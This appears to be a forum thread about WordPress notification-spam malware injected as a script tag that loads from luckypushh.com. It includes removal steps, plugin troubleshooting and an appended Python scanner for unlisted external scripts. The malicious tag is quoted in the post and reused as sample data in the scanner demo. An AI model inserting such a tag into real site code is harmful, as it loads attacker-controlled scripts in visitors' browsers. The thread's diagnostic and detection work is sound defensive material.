
I was contacted by a friend who said that a pop-up box started appearing, just like the one which asks for browser notification permission. On examining the box, it turned out to be malware


1 Answer

Best answer

I was contacted by a friend who said that a pop-up box started appearing, just like the one which asks for browser notification permission. On examining the box, it turned out to be malware pushing subscriptions for a website, Luckypushh.com.

At the time of writing I couldn't pinpoint the exact plugin which injected it, but as the last two updated apps were All In One SEO and Sucuri Defender, the strongest chances are of these two plugins.

The following code was injected on the blog

<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>

A Google search didn't show much about luckypushh.com, just that the domain was registered on 30 March 2018. There are 125 indexed searches on Google with the same injected code but a different parameter number.

On clicking "Allow" in the fake notification subscriber, it opens up a pop-up box, which prompts an actual browser notification for the website "Luckypushh.com".

How to Remove Luckypushh Notification Subscribe Malware

Open your WordPress Dashboard and go to Appearance > Editor, select the "header" file and remove the script tags highlighted at line 8.

Any information on the actual culprit would be highly appreciated, so that I may add to it and remove the bloody plugin for good.

I've had the same problem. I didn't find the Luckypushh code in the header, so I restored a backup of the site. I'm not using either of the plugins you mentioned; maybe we could compare plugins and see if we have any in common? My site is using the GeneratePress theme with the free version of Elementor.
Were you by any chance using Easy Facebook Likebox? I suspect it might be the culprit.
Can you link to a recent plugin update and this issue appearing?

We can. You can email me your plugin list, and I'll email you the plugin list of the above-mentioned blog.

No, the blog doesn't have Easy Facebook Likebox...

This makes it weird
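
Since the injected tag was in the header file on one site but not on another, a scan of every theme and plugin file is more reliable than checking one template. The following is an added example, not code from the original thread: it walks a directory tree and reports `<script src=...>` tags that load from hosts outside an allowlist. The function names, the allowlist and the sample directory are assumptions made for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Matches the src attribute of a <script> tag, including protocol-relative URLs.
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")


def external_host(src):
    """Return the lowercase host of an absolute or //-relative URL, else None."""
    if src.startswith("//"):
        src = "https:" + src
    host = urlparse(src).hostname
    return host.lower() if host else None


def scan_tree(root, allowed_hosts):
    """Return (path, line_no, host, line) for script tags loading from unlisted hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, start=1):
                    for src in SCRIPT_SRC.findall(line):
                        host = external_host(src)
                        if host and host not in allowed:
                            findings.append((path, line_no, host, line.strip()))
    return findings


def demo():
    """Run the scan over a constructed theme directory (sample data, not a real site)."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "sample")
        os.makedirs(theme)
        with open(os.path.join(theme, "header.php"), "w", encoding="utf-8") as fh:
            fh.write('<head>\n<script src="https://example.org/app.js"></script>\n'
                     '<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>\n</head>\n')
        return [(os.path.basename(p), n, h) for p, n, h, _ in scan_tree(root, {"example.org"})]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real site, call `scan_tree` on the `wp-content` directory with the hosts the site is known to load scripts from. It only inspects files on disk, so a tag stored in the database would not show up.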